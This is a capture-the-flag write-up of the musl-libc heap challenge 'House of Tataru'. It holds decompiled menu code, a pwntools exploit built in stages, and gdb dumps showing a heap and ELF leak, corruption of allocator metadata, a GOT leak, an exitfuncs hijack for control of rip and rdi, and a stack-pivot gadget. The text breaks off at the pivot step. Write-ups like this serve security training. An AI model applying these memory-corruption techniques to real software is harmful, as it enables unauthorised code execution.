House_of_tataru

Attachment: house_of_tataru.zip xpl.py

Team: Super Guesser

Tataru Taru wants to solo the boss,but she seems to have no way to do this alone, please help her!
1.Summon a pet to fight with tataru.
2.Order pet to leave the battlefield.
3.Order pet to parpre for attacking the boss.
4.Order pet to start attacking the boss.
5.Order pet to attack tataru.
The boss casts chaos and puts a lot of heap checks to the program!
:
Canary                        : ✓ (value: 0x99786e61501bce00)
NX                            : ✓ 
PIE                           : ✓ 
Fortify                       : ✘ 
RelRO                         : Full

Tataru was a heap challenge based on musl-libc, which gave me a hard time, since I had nearly no experience with musl-libc at all.

To be honest, even while doing this challenge I avoided digging into musl much and solved it in a more “ghetto way” instead: analyzing everything in gdb, searching for good addresses and experimenting a lot.

So, let’s take a look at the different functionalities:

1.Summon a pet to fight with tataru.

case '1':
    read(0, &buf, 4);
    size = buf;

    read(0, &buf, 1);
    idx = (unsigned int)(char)buf;

    if ( (unsigned int)idx > 1 )
        exit(0);
        
    ENTRIES[idx].size = size;
    
    if ( size <= 0x1000 ) {
        // some weird heap sanity check
        chunk = &calloc + 0x114D8;
        do {
            if ( *chunk && *(*chunk + 1) != **chunk ) {
              write(1, "hacker!", 7);
              exit(0);
            }
            ++chunk;
        }
        while ( &calloc + 0x11508 != chunk );
        
        // create pet entry
        obj = &ENTRIES[idx];
        obj->buffer = calloc(1, size);
        obj->offset = 0;
        
        read_bytes = read(0, obj->buffer, size);

        if ( read_bytes > 0 )
          obj->offset += read_bytes;
        else
            write(1, "failed", 6);
    }
    else
    {
        write(1, "no more magic", 0xD);
    }
    break;

For creating a pet, we first have to send 4 bytes, which will be the size for the spell to use (buffer) and then one byte, which will be the index, at which the pet will be stored.

struct Pet {
    char* buffer;
    unsigned long size;
    unsigned long offset;
};

It will then allocate a spell buffer for it and read our input into it. The length of our input will be stored in offset and the initial size in size.

And here’s already the main bug for this challenge: if we specify a size > 0x1000, it will store the size in the pet object, but then bail out of the function with the message no more magic without reallocating the object.

ENTRIES[idx].size = size;
    
if ( size <= 0x1000 ) {
...

We can use this to create an object with a smaller size (for example 0x30) and then call this function again with a size of 0x1200, which will result in a pet, which has a 0x30 buffer allocated, but a size of 0x1200. This will come in handy later on.

2.Order pet to leave the battlefield.

case '2':
    read(0, &buf, 1);
    idx = (unsigned int)(char)buf;

    if ( (unsigned int)idx > 1 )
        exit(0);

    write(1, "Tataru tripped your pet and you failed to order it!\n", 0x34);

    ENTRIES[idx].offset = ENTRIES[idx].size;

    break;

This just sets the offset of the object to its size. Normally this would prevent us from appending more data to the buffer, since the append function checks that offset is smaller than size.

But as we’ve already seen, we will be able to manipulate size for the pet afterwards again, so we can abuse this to set offset to an arbitrary value.

3.Order pet to parpre for attacking the boss.

case '3':
    read(0, &buf, 1);
    idx = (unsigned int)(char)buf;

    if ( (unsigned int)idx > 1 )
        exit(0);

    offset = ENTRIES[idx].offset;
    stored_size = ENTRIES[idx].size;

    if ( offset >= stored_size )
        continue;

    obj = &ENTRIES[idx];

    cur_pos = &obj->buffer[offset];

    // mean oob write check :(
    if ( cur_pos >= &calloc + 0xFFFFAB76 ) {
        write(1, "hacker!", 7);
        exit(0);
    }

    read_bytes = read(0, cur_pos, stored_size - offset);
    if ( read_bytes > 0 ) {
        obj->offset += read_bytes;
        continue;
    }

    write(1, "failed", 6);
    break;

This option lets us append data to our pet's spell buffer (at the current offset).

if ( cur_pos >= &calloc + 0xFFFFAB76 ) {

That check, however, verifies that the current write position (buffer + offset) is not above the libc base address, so no easy leaks or overwrites are possible.

This also results in some quirky behaviour: musl allocates some chunks between libc and the stack, and the challenge terminates if you try to write to those chunks (though they aren’t corrupted or anything), which was kinda weird in the beginning.

It’s also important to note that read will not segfault if it is asked to read into an unmapped memory region. The syscall simply fails (it returns -1 with EFAULT), so we just get a "failed" response from the challenge in that case.

4.Order pet to start attacking the boss.

case '4':
    read(0, &buf, 1);
    idx = (unsigned int)(char)buf;

    if ( (unsigned int)idx > 1 )
        exit(0);

    obj = &ENTRIES[idx];

    if ( &obj->buffer[obj->offset] >= (char *)&calloc + 0xFFFD5BB0 ) {
        write(1, "hacker!", 7);
        exit(0);
    }

    write(1, "Tataru tripped your pet, your pet failed to use ", 0x30);

    buffer_offset = &obj->buffer[obj->offset];
    len_buffer = strlen(buffer_offset);
    
    write(1, buffer_offset, len_buffer);

    write(1, " to attack the boss\n", 0x14);
    break;

This is pretty much a leaking function. It prints the string at buffer+offset. But again, it also checks that the address is not above the base address of libc, which made it quite hard to get any useful leaks except heap addresses.

5.Order pet to attack tataru.

case '5':
    write(1, "You have defeated tataru, you have won!\n", 0x28);
    return 0;

This just quits the application, which could be useful if you managed to write a ropchain to the stack and return into it. But I didn’t find a way to leak a stack address, so I didn’t use it at all.

So, the main bug in this challenge is the fact that we can change the size of an already allocated chunk without reallocating it.

With this we can simply overflow the spell buffer chunk. But by combining this with option 2, which sets the offset to the current size, we can even do an arbitrary “relative” oob write and read.

  • Allocate a chunk with size < 0x1000
  • Call option 1 again with size = relative offset to write to (has to be > 0x1000, so that nothing gets reallocated)
  • Call option 2 to set offset to current size
  • Call option 1 again and set size to a bigger value (again > 0x1000)
  • Can now write or read to it
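
The steps above can be replayed against a small model of the menu logic. This is only a sketch in plain Python 3, not the challenge binary: `Pet`, `summon`, `leave`, `write_pos` and `relative_target` are hypothetical names that mirror the decompiled options 1 to 3, and the buffer is just a fake address.

```python
MAX_SIZE = 0x1000  # limit checked by option 1 in the decompilation


class Pet:
    """Toy model of one ENTRIES slot (buffer is only a fake address)."""

    def __init__(self):
        self.buffer = 0
        self.size = 0
        self.offset = 0


def summon(pet, size, fake_alloc_addr=0, data_len=0):
    """Option 1: the size is stored BEFORE the limit check (the bug)."""
    pet.size = size
    if size > MAX_SIZE:
        return "no more magic"  # buffer and offset stay untouched
    pet.buffer = fake_alloc_addr
    pet.offset = data_len
    return "ok"


def leave(pet):
    """Option 2: offset is set to the stored size."""
    pet.offset = pet.size


def write_pos(pet):
    """Option 3: address the next read() would write to, or None."""
    if pet.offset >= pet.size:
        return None
    return pet.buffer + pet.offset


def relative_target(pet, rel_off, length=8):
    """Replay the steps from the list and return the resulting write address."""
    summon(pet, rel_off)           # > 0x1000: only the size changes
    leave(pet)                     # offset = rel_off
    summon(pet, rel_off + length)  # reopen a window of `length` bytes
    return write_pos(pet)


pet = Pet()
summon(pet, 0x30, fake_alloc_addr=0x555555558cb0, data_len=1)
target = relative_target(pet, 0x1468)
print(hex(target))
```

The buffer pointer never changes after the first allocation, only size and offset do, which is why the write lands at buffer + relative offset.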

Let’s start with a heap leak:

from pwn import *

# option 1: allocate a buffer of `size` in slot `idx` and fill it with `data`
def summon(idx, size, data):
    r.send("1")
    
    r.send(p32(size))
    r.send(p8(idx))
    
    if len(data) == size:
        r.send(data)
    else:
        r.sendline(data)

    r.recvuntil(":")

# option 1 with size > 0x1000: only overwrites the stored size
def set_size(idx, size):
    r.send("1")
    r.send(p32(size))
    r.send(p8(idx))
    r.recvuntil(":")

# option 2: sets offset = size
def set_cursize(idx):
    r.send("2")
    r.send(p8(idx))
    r.recvuntil(":")

# option 3: write `data` to buffer + offset
def prepare(idx, data, sendline=False):
    r.send("3")
    r.send(p8(idx))
    
    if sendline:
        r.sendline(data)
    else:
        r.send(data)
    return r.recvuntil(":")

# option 4: print the string at buffer + offset
def leak(idx):
    r.send("4")
    r.send(p8(idx))
    r.recvuntil("use ")
    LEAK = r.recvuntil(" to attack", drop=True)
    r.recvuntil(":")
    return LEAK

def exploit(r):
    r.recvuntil(":")

    # create some chunks in slot 1
    for i in range(5):
        summon(1, 0x40, "")

    # create another chunk in slot 0
    summon(0, 0x40, "")

    # overwrite size of slot 0
    set_size(0, 0x1010)

    # align slot 0 buffer with heap address on bss
    # (offset is already 1 from the newline sent by summon, so 0x2e0-1 bytes are left)
    payload = "A"*(0x2e0-1)
    prepare(0, payload)

    # read heap address from bss
    LEAK = u64(leak(0).ljust(8, "\x00"))
    HEAP = LEAK - 0xb8

    log.info("HEAP leak       : %s" % hex(LEAK))
    log.info("HEAP base       : %s" % hex(HEAP))

    r.interactive()
    
    return

musl tries to optimize memory usage and will also reuse unused memory from bss.

After allocating 5 chunks (which were served from a region behind libc), the 6th chunk was allocated on bss.

gef➤  x/30gx 0x0000555555558000
0x555555558000:	0x0000555555558000	0x0000000000000000
0x555555558010:	0x0000000000000000	0x0000000000000000
0x555555558020:	0x0000000000000000	0x0000000000000000
0x555555558030:	0x0000000000000000	0x0000000000000000
0x555555558040:	0x0000555555558cb0	0x0000000000001010 <- slot 0 buffer / size
0x555555558050:	0x00000000000002e0	0x00007ffff7ffede0 <- slot 0 offset / slot 1 buffer
0x555555558060:	0x0000000000000040	0x0000000000000001 <- slot 1 size / slot 1 offset
0x555555558070:	0x0000000000000000	0x0000000000000000
0x555555558080:	0x0000000000000000	0x0000000000000000

gef➤  x/30gx 0x0000555555558cb0+0x2e0
0x555555558f90:	0x000055555555a0b8	0x0000ff0000000000 <- musl heap address
0x555555558fa0:	0x0000000000000000	0x0000000000000000

By corrupting the size of the first pet, we can align its buffer to the heap address and leak it.

[*] HEAP leak       : 0x55555555a0b8
[*] HEAP base       : 0x55555555a000
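
Since option 4 prints with strlen, only the six non-zero bytes of the pointer come back, which is why the exploit pads the leak before unpacking it. A minimal stdlib-only sketch of that step (Python 3, with a hypothetical `parse_leak` helper standing in for the pwntools `u64(...ljust(8, ...))` call, and the raw bytes reconstructed from the logged value):

```python
import struct


def parse_leak(raw):
    """Pad a NUL-truncated leak to 8 bytes and unpack it as little-endian."""
    return struct.unpack("<Q", raw[:8].ljust(8, b"\x00"))[0]


# bytes option 4 would print for the pointer 0x55555555a0b8
raw = bytes.fromhex("b8a055555555")

leak_addr = parse_leak(raw)
heap_base = leak_addr - 0xb8  # offset of the leaked pointer inside the heap page

print(hex(leak_addr), hex(heap_base))
```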

Since options 2-5 all had those pesky libc checks, we couldn’t use those to get a buffer in or behind libc.

Only option 1 doesn’t check the buffer address before writing to it, so I concluded that the only way to get a write into libc was to abuse musl's allocator into serving us a buffer inside libc.

But for corrupting anything in musl's arenas, we would need to be able to calculate the offset from a chunk on bss to an address on the heap, where musl's metadata is stored. For this, we’d need to get a leak for bss first…

Sounds easy, but getting this leak took me the most time.

I allocated chunks in different ways for hours, trying to find a situation in which a libc address or an address from the challenge binary would end up somewhere behind a chunk, so we could read it via the oob read, but no luck…

At some point, I got desperate and thought: Ok, screw it, with ASLR active, heap and bss address will “only” differ by 2 bytes, maybe give bruteforcing a try…

But, well yeah… Bruteforcing two bytes would take way too long remotely (every try took 10 seconds, so it might have finished in a week or so).

But thinking about bruteforcing led me to another idea. Remember that the read in option 3 will not segfault when reading into an unmapped region? Yep, we can totally use this to create a “heap offset finder” :)

def test_off(idx, off):
    set_size(idx, off)
    set_cursize(idx)
    set_size(idx, off+8)
    resp = prepare(idx, "", True)
    if "failed" in resp:
        r.recv(1)
        return False

    return True

def exploit(r):
    r.recvuntil(":")

    summon(0, 0x30, "")

    # Find a valid offset to start of heap
    HEAP_OFF = 0x1060+8

    while True:
        log.info("Test: %s" % hex(HEAP_OFF))

        # stop at the first offset where read() succeeds
        if test_off(0, HEAP_OFF):
            break

        HEAP_OFF += 0x1000

    HEAP_OFF -= 0x8

    log.info("HEAP offset: %s" % hex(HEAP_OFF))

gef➤  vmmap
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x0000562f10f4a000 0x0000562f10f4b000 0x0000000000000000 r-- /home/kileak/ctf/n1ctf/tataru/pwn
0x0000562f10f4b000 0x0000562f10f4c000 0x0000000000001000 r-x /home/kileak/ctf/n1ctf/tataru/pwn
0x0000562f10f4c000 0x0000562f10f4d000 0x0000000000002000 r-- /home/kileak/ctf/n1ctf/tataru/pwn
0x0000562f10f4d000 0x0000562f10f4e000 0x0000000000002000 r-- /home/kileak/ctf/n1ctf/tataru/pwn
0x0000562f10f4e000 0x0000562f10f4f000 0x0000000000003000 rw- /home/kileak/ctf/n1ctf/tataru/pwn
0x0000562f128f7000 0x0000562f128f8000 0x0000000000000000 --- [heap]
0x0000562f128f8000 0x0000562f128f9000 0x0000000000000000 rw- [heap]

gef➤  x/30gx 0x0000562f10f4e000
0x562f10f4e000:	0x0000562f10f4e000	0x0000000000000000
0x562f10f4e010:	0x0000000000000000	0x0000000000000000
0x562f10f4e020:	0x0000000000000000	0x0000000000000000
0x562f10f4e030:	0x0000000000000000	0x0000000000000000
0x562f10f4e040:	0x0000562f10f4efa0	0x0000000000000030 <= buffer
0x562f10f4e050:	0x0000000000000001	0x0000000000000000
0x562f10f4e060:	0x0000000000000000	0x0000000000000000
0x562f10f4e070:	0x0000000000000000	0x0000000000000000

First we align the offset to a page boundary behind the end of bss (0x0000562f10f4efa0 + 0x1060 = 0x562f10f50000).

Then we’ll just try to read from that offset. If it fails, we’ll add 0x1000 to the offset and try again, until the read succeeds. As soon as read doesn’t fail, we will have hit the start of heap and by this know the offset from the current buffer to heap.
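
Stripped of the network I/O, the search is just a page-wise linear scan. The following is a sketch in plain Python 3 under stated assumptions: `find_mapped_offset` and `fake_probe` are hypothetical names, the probe stands in for `test_off`, and the addresses are taken from one of the logged runs to fake a memory layout.

```python
PAGE = 0x1000


def find_mapped_offset(probe, start, step=PAGE, max_tries=0x20000):
    """Return the first offset for which probe(offset) reports success."""
    off = start
    for _ in range(max_tries):
        if probe(off):
            return off
        off += step
    raise RuntimeError("no mapped page found")


# Fake layout for the demo (values from one logged run):
buffer_addr = 0x55a3c8a4b000 + 0xfa0  # pet buffer on bss
heap_start = 0x55a3c9ff5000           # first writable heap page
heap_end = heap_start + PAGE


def fake_probe(off):
    """Stand-in for test_off(): True if buffer+off hits the heap page."""
    return heap_start <= buffer_addr + off < heap_end


found = find_mapped_offset(fake_probe, 0x1060 + 8)
heap_off = found - 8  # drop the 8 bytes that skip the first qword

print(hex(heap_off))
```

Every probe costs a few round trips to the server, so the number of iterations is what dominates the runtime of the exploit.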

The reason I added another 8 bytes to the offset is that we don’t want to write into the first qword on the heap, because there is a canary there, which musl uses to validate its arena regions. So, our first valid write will go to heap+0x8, which is totally fine.

As soon as we know the offset to the heap, we can calculate elf base with our previous heap leak.

BSS = HEAP + 0x8 - HEAP_OFF - 0xf90 - 0x18
ELF = BSS - 0x4000

log.info("BSS             : %s" % hex(BSS))
log.info("ELF             : %s" % hex(ELF))

[*] Test: 0x15a6068
[*] Test: 0x15a7068
[*] Test: 0x15a8068
[*] Test: 0x15a9068
[*] HEAP offset: 0x15a9060
[*] HEAP leak       : 0x55a3c9ff50b8
[*] HEAP base       : 0x55a3c9ff5000
[*] BSS             : 0x55a3c8a4b000
[*] ELF             : 0x55a3c8a47000
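
The logged values can be double-checked by hand. A small worked example in plain Python 3, assuming (as in the dump above) that the pet buffer sits at bss+0xfa0; `bases_from_heap` is a hypothetical helper that is algebraically the same as the BSS formula used in the exploit:

```python
def bases_from_heap(heap_base, heap_off):
    """Derive bss and ELF base from the heap leak and the found offset."""
    buffer_addr = heap_base - heap_off  # buffer + heap_off == heap base
    bss = buffer_addr - 0xfa0           # buffer sits at bss+0xfa0 in this setup
    elf = bss - 0x4000
    return bss, elf


# values from the log above
bss, elf = bases_from_heap(0x55a3c9ff5000, 0x15a9060)
print(hex(bss), hex(elf))

# the formula as written in the exploit gives the same result
same = 0x55a3c9ff5000 + 0x8 - 0x15a9060 - 0xf90 - 0x18
print(hex(same))
```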

Depending on ASLR, finding the offset can take a long time, and I already feared that this approach would run into a timeout on the remote server. As it turned out, it worked totally fine (the Dockerfile that was released later also showed that the challenge had a 30 minute timeout).

So, armed with a heap and elf leak, we can now finally calculate the needed offset to overwrite stuff on the heap with our relative oob write.

Since I still didn’t want to dig deeper into musl, I went on with “dynamic analysis” >;)

I allocated some chunks (size 0x30) and checked where they got allocated. Then I restarted the exploit, paused it right before a chunk would get allocated, and searched the heap for a value close to the address where that next chunk would be stored. Finally, I used the oob write to replace this value with another address before the allocation happened.

Doing this, I found, that the next arena would be created at the address stored at 0x55555555a118. So, let’s overwrite it with a pointer to bss.

# 0x55555555a118 => allocation of next arena
BUFFER = BSS + 0xcb0
OFFSET = (HEAP + 0x118) - BUFFER

# overwrite next free chunk address with pointer to bss	
set_size(0, OFFSET)
set_cursize(0)
set_size(0, OFFSET+8)

prepare(0, p64(BSS + 0x10))

gef➤  x/30gx 0x55555555a108
0x55555555a108:	0x000055555555a040	0x000055555555a040
0x55555555a118:	0x0000555555558010	0x0000000100000000 <= next arena allocation
0x55555555a128:	0x00000000000004c0	0x0000000000000000
0x55555555a138:	0x0000000000000000	0x00007ffff7ffec40
0x55555555a148:	0x0000000000000000	0x00000000000003c0

After this, the next allocated chunk would overlap our ENTRIES table, so we can write arbitrary pointers into it.
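
The same four calls (set_size, set_cursize, set_size, prepare) come back for every relative write in the exploit, so it helps to see them as one unit. A sketch in plain Python 3 that only builds the list of calls instead of sending anything; `relative_write_plan` is a hypothetical helper, and the addresses are the non-ASLR values from the dumps:

```python
import struct


def relative_write_plan(idx, buffer_addr, target_addr, data):
    """List the menu calls needed to write `data` at target_addr via slot idx."""
    off = target_addr - buffer_addr
    if off <= 0x1000:
        # option 1 would reallocate the buffer instead of only storing the size
        raise ValueError("offset must be larger than 0x1000")
    return [
        ("set_size", idx, off),
        ("set_cursize", idx),
        ("set_size", idx, off + len(data)),
        ("prepare", idx, data),
    ]


BSS = 0x555555558000
HEAP = 0x55555555a000

data = struct.pack("<Q", BSS + 0x10)
plan = relative_write_plan(0, BSS + 0xcb0, HEAP + 0x118, data)

for step in plan:
    print(step)
```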

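I pointed slot 0 to the entry table itself, and slot 1 to read.got. Since reading the 0x30 byte payload bumps the offset of slot 0 to 0x30, its buffer pointer is set 0x30 bytes lower to compensate.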

# overwrite entries table to prepare libc leak	
payload = p64(BSS + 0x40- 0x30) + p64(0x1000)   # 0 -> point to entry table itself
payload += p64(0x0) + p64(ELF + 0x3fb0)         # 1 -> point to read got
payload += p64(0x100) + p64(0)

# next allocation will overwrite entry table
summon(0, 0x30, payload)

# read read.got from pet 1 buffer
LIBCLEAK = u64(leak(1).ljust(8, "\x00"))
LIBC = LIBCLEAK - 0x74f10

log.info("LIBC leak       : %s" % hex(LIBCLEAK))
log.info("LIBC            : %s" % hex(LIBC))

gef➤  x/30gx 0x0000555555558000
0x555555558000:	0x0000555555558000	0x0000000000000000
0x555555558010:	0x0000000000000000	0x0000c00000000000
0x555555558020:	0x000055555555a220	0x0000c00000000001
0x555555558030:	0x000055555555a1f8	0x0000a00000000006
0x555555558040:	0x0000555555558010	0x0000000000001000 <= slot 0 buffer / slot 0 size
0x555555558050:	0x0000000000000030	0x0000555555557fb0 <= slot 0 offset / slot 1 buffer (read.got)
0x555555558060:	0x0000000000000100	0x0000000000000000 <= slot 1 size / slot 1 offset
0x555555558070:	0x0000000000000000	0x000000000000000c

[*] Test: 0x1068
[*] HEAP offset: 0x1060
[*] HEAP leak       : 0x55555555a0b8
[*] HEAP base       : 0x55555555a000
[*] BSS             : 0x555555558000
[*] ELF             : 0x555555554000
[*] LIBC leak       : 0x7ffff7fbbf10
[*] LIBC            : 0x7ffff7f47000
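
The 0x30 byte payload is nothing more than two packed Pet structs (buffer, size, offset). A stdlib-only sketch in Python 3 that rebuilds it field by field; `pack_pet` is a hypothetical helper and the base addresses are the non-ASLR values from the log above:

```python
import struct


def pack_pet(buffer, size, offset):
    """Pack one ENTRIES slot: char *buffer, unsigned long size, offset."""
    return struct.pack("<QQQ", buffer, size, offset)


BSS = 0x555555558000
ELF = 0x555555554000

payload = pack_pet(BSS + 0x40 - 0x30, 0x1000, 0)  # slot 0 -> entry table
payload += pack_pet(ELF + 0x3fb0, 0x100, 0)       # slot 1 -> read.got

fields = struct.unpack("<6Q", payload)
print([hex(f) for f in fields])
```

Note that the gdb dump shows 0x30 instead of 0 as slot 0 offset, because the binary adds the number of bytes read after the payload has been written.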

Since the first pet buffer points to the entry table itself, we can use it to overwrite the entry table again.

# overwrite entries table
payload = p64(BSS + 0x100 -0x30) + p64(0x1000)  # 0 -> point to helper buffer
payload += p64(0x0) + p64(BSS + 0x40)           # 1 -> point to entry table
payload += p64(0x100) + p64(0)

# overwrite entry table
prepare(0, payload)

At this point, I prepared a “helper buffer” which can be accessed via slot 0. This will be needed later in the exploit. I’ll skip it for now, but we’ll get back to it.

Let’s first think about how we can achieve rip control. We don’t have a stack leak, and due to the checks in the binary, I’m not sure, if it’s even possible to get one, so we cannot put a ropchain on the stack and return to it.

I thought musl might also be using some kind of exitfuncs, so I debugged through the code of exit, and indeed it does. We can easily trigger exit by pointing a chunk to somewhere in or behind libc and accessing it: the "hacker!" check, which was bugging us the whole time, now comes to our rescue.

 ---------------------------------------------------------------------------------------------
   0x7ffff7f666ad                  push   rbp
   0x7ffff7f666ae                  push   rbx
   0x7ffff7f666af                  call   0x7ffff7fb2480
 → 0x7ffff7f666b4                  mov    rdx, QWORD PTR [rip+0x9768d]        # 0x7ffff7ffdd48
   0x7ffff7f666bb                  test   rdx, rdx
   0x7ffff7f666be                  je     0x7ffff7f66760
   0x7ffff7f666c4                  mov    ecx, DWORD PTR [rip+0x9789a]        # 0x7ffff7ffdf64
   0x7ffff7f666ca                  lea    eax, [rcx-0x1]
   0x7ffff7f666cd                  mov    DWORD PTR [rip+0x97891], eax        # 0x7ffff7ffdf64

At 0x7ffff7f666b4 it will read the address of the exitfuncs table from 0x7ffff7ffdd48.

---------------------------------------------------------------------------------------------
   0x7ffff7f666b4                  mov    rdx, QWORD PTR [rip+0x9768d]        # 0x7ffff7ffdd48
   0x7ffff7f666bb                  test   rdx, rdx
   0x7ffff7f666be                  je     0x7ffff7f66760
 → 0x7ffff7f666c4                  mov    ecx, DWORD PTR [rip+0x9789a]        # 0x7ffff7ffdf64
   0x7ffff7f666ca                  lea    eax, [rcx-0x1]
   0x7ffff7f666cd                  mov    DWORD PTR [rip+0x97891], eax        # 0x7ffff7ffdf64
   0x7ffff7f666d3                  test   ecx, ecx
   0x7ffff7f666d5                  jle    0x7ffff7f6672e
   0x7ffff7f666d7                  nop    WORD PTR [rax+rax*1+0x0]

At 0x7ffff7f666c4 it will read the count of entries from 0x7ffff7ffdf64.

---------------------------------------------------------------------------------------------
   0x7ffff7f666e7                  nop    WORD PTR [rax+rax*1+0x0]
   0x7ffff7f666f0                  cdqe   
   0x7ffff7f666f2                  mov    rdi, rbx
 → 0x7ffff7f666f5                  mov    r12, QWORD PTR [rdx+rax*8+0x108]
   0x7ffff7f666fd                  mov    rbp, QWORD PTR [rdx+rax*8+0x8]
   0x7ffff7f66702                  call   0x7ffff7fb2570
   0x7ffff7f66707                  mov    rdi, r12
   0x7ffff7f6670a                  call   rbp
   0x7ffff7f6670c                  mov    rdi, rbx

If we set entry count to 1, rax will now be 0 and r12 will be read from [rdx+0x108] (which will be moved to rdi at 0x7ffff7f66707). We can use this to set the argument for the function that will be called.

At 0x7ffff7f666fd rbp will be set to [rdx+8] and will then be called.
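
The three reads above can be put together in a tiny model. This is a sketch in plain Python 3 that only mirrors what the disassembly shows (table pointer, count, function at table+0x8, argument at table+0x108); it ignores the lock calls and anything else exit does, `exit_dispatch` is a hypothetical name, and memory is faked with a dict of qwords:

```python
TABLE_PTR = 0x7ffff7ffdd48  # address the table pointer is read from
COUNT = 0x7ffff7ffdf64      # address the entry count is read from


def exit_dispatch(mem, table_ptr_addr=TABLE_PTR, count_addr=COUNT):
    """Return the (function, argument) pairs the loop would call, in order."""
    calls = []
    table = mem.get(table_ptr_addr, 0)
    if table == 0:
        return calls
    count = mem.get(count_addr, 0)
    while count > 0:
        count -= 1
        func = mem.get(table + 0x8 + count * 8, 0)
        arg = mem.get(table + 0x108 + count * 8, 0)
        calls.append((func, arg))
    return calls


BSS = 0x555555558000
mem = {
    TABLE_PTR: BSS + 0x100 - 8,  # fake table, so that func[0] sits at BSS+0x100
    COUNT: 1,
    BSS + 0x100: 0xdeadbeef,     # function pointer (placeholder)
    BSS + 0x200: 0xcafebabe,     # argument (placeholder)
}

calls = exit_dispatch(mem)
print([(hex(f), hex(a)) for f, a in calls])
```

With the table pointer set to BSS+0xf8, the function pointer and its argument end up exactly 0x100 bytes apart, at BSS+0x100 and BSS+0x200.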

So to get an arbitrary call, we need to

  • Write the address of a fake exitfunc table to 0x7ffff7ffdd48
  • Write 0x1 (for rcx) to 0x7ffff7ffdf64
  • Write the address of the gadget we want to call into our fake exitfunc table
  • Write the argument (rdi) for our gadget into fake exitfunc table +0x108

# 0x55555555a050 has next free target address
BUFFER = BSS + 0x40
OFFSET = (HEAP + 0x50) - BUFFER

set_size(1, OFFSET)
set_cursize(1)
set_size(1, OFFSET+8)

# overwrite next free arena address to point near exitfuncs address
prepare(1, p64(LIBC + 0xb6d10 - 0x30))

payload = "A"*0x48
payload += p64(BSS+0x100-8)        # point to helper buffer

summon(0, 0x100, payload)

payload = "A"*(0x130-4-8)
payload += p32(0x1)                # count for exitfuncs (rcx)

summon(1, 0x130, payload)

This will point the exitfunc table address to our previously created helper buffer and the second allocation will overwrite 0x7ffff7ffdf64 with 0x1, setting rcx to the correct value.

So, we now need to go back to the point in the exploit where we set up our helper buffer, and prepare our fake exitfunc table there.

# write fake exitfunc table to BSS + 0x100
prepare(0, p64(0xdeadbeef))       # rip

# overwrite entry table again
payload = p64(BSS + 0x200) + p64(0x1000)
payload += p64(0x0) + p64(BSS + 0x40)
payload += p64(0x100) + p64(0)

prepare(1, payload)

# write exitfunc argument to BSS + 0x200
payload = p64(0xcafebabe)         # rdi

prepare(0, payload)

Let’s check exit again.

0x00007ffff7f6670a in ?? () from /lib/ld-musl-x86_64.so.1
───────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x41414141        
$rbx   : 0x00007ffff7ffdf60  →  0x0000000041414141 ("AAAA"?)
$rcx   : 0x1               
$rdx   : 0x00005555555580f8  →  0x0000000000000000
$rsp   : 0x00007fffffffdaf0  →  0x0000555555556250  →  0xfffff170fffff1c0
$rbp   : 0xdeadbeef        
$rsi   : 0x0000555555556229  →  0x002172656b636168 ("hacker!"?)
$rdi   : 0xcafebabe        
$rip   : 0x00007ffff7f6670a  →   call rbp
$r8    : 0x0               
$r9    : 0x0               
$r10   : 0x0               
$r11   : 0x246             
$r12   : 0xcafebabe        
$r13   : 0x0000555555558040  →  0x00007ffff7ffdd00  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$r14   : 0x0000555555558040  →  0x00007ffff7ffdd00  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$r15   : 0x130             
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7f666fd                  mov    rbp, QWORD PTR [rdx+rax*8+0x8]
   0x7ffff7f66702                  call   0x7ffff7fb2570
   0x7ffff7f66707                  mov    rdi, r12
 → 0x7ffff7f6670a                  call   rbp
   0x7ffff7f6670c                  mov    rdi, rbx
   0x7ffff7f6670f                  call   0x7ffff7fb2480
   0x7ffff7f66714                  mov    edx, DWORD PTR [rip+0x9784a]        # 0x7ffff7ffdf64
   0x7ffff7f6671a                  lea    eax, [rdx-0x1]
   0x7ffff7f6671d                  test   edx, edx
───────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffdaf0│+0x0000: 0x0000555555556250  →  0xfffff170fffff1c0	 ← $rsp
0x00007fffffffdaf8│+0x0008: 0x0000000000000000
0x00007fffffffdb00│+0x0010: 0x0000555555556219  →  0x726f6d206f6e003a (":"?)
0x00007fffffffdb08│+0x0018: 0x00007ffff7f5c09c  →  <exit+12> call 0x7ffff7fbf5e0
0x00007fffffffdb10│+0x0020: 0x00007fffffffdb48  →  0x0000000000000100
0x00007fffffffdb18│+0x0028: 0x0000555555555517  →   imul r14, r14, 0x18
─────────────────────────────────────────────────────────────────────────── arguments (guessed) ────
*0xdeadbeef (
   $rdi = 0x00000000cafebabe,
   $rsi = 0x0000555555556229 → 0x002172656b636168 ("hacker!"?),
   $rdx = 0x00005555555580f8 → 0x0000000000000000
)
────────────────────────────────────────────────────────────────────────────────────────────────────

Perfect, we got rip control and even control the argument in rdi.

We could be finished already, but we won’t be able to call system("/bin/sh") or a one_gadget, since the challenge uses seccomp:

"""
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x07 0xc000003e  if (A != ARCH_X86_64) goto 0009
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x04 0xffffffff  if (A != 0xffffffff) goto 0009
 0005: 0x15 0x03 0x00 0x0000003b  if (A == execve) goto 0009
 0006: 0x15 0x02 0x00 0x0000009d  if (A == prctl) goto 0009
 0007: 0x15 0x01 0x00 0x00000142  if (A == execveat) goto 0009
 0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0009: 0x06 0x00 0x00 0x00000000  return KILL
"""

So, we will need to do a ropchain. I looked for a gadget for pivoting the stack into some controlled area, and musl libc just contained a wonderful gadget to do this:

0x000000000007b1f5: mov rsp, qword ptr [rdi + 0x30]; jmp qword ptr [rdi + 0x38];

Since we control rdi, we can just put an address at rdi+0x30 pointing to one of our buffers and put a simple ret gadget at rdi+0x38. Calling this gadget will then pivot the stack into our buffer and continue execution there.

# 0x000000000007b1f5: mov rsp, qword ptr [rdi + 0x30]; jmp qword ptr [rdi + 0x38];
